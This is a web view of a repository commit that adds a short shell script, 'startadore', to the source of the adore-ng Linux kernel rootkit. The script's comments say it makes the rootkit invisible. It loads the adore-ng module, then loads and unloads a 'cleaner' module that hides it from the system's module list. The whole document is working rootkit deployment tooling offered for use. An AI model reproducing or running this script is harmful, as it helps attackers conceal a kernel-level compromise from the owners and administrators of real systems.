summaryrefslogtreecommitdiff
path: root/other/adore-ng/startadore
diff options
context:
space:
mode:
Diffstat (limited to 'other/adore-ng/startadore')
-rwxr-xr-xother/adore-ng/startadore11
1 files changed, 11 insertions, 0 deletions
diff --git a/other/adore-ng/startadore b/other/adore-ng/startadore
new file mode 100755
index 0000000..a30751e
--- /dev/null
+++ b/other/adore-ng/startadore
@@ -0,0 +1,11 @@
1#!/bin/sh
2
3# Use this script to bootstrap adore!
4# It will make adore invisible. You could also
5# insmod adore without $0 but then its visible.
6
7insmod ./adore-ng.o
8insmod ./cleaner.o
9rmmod cleaner
10
11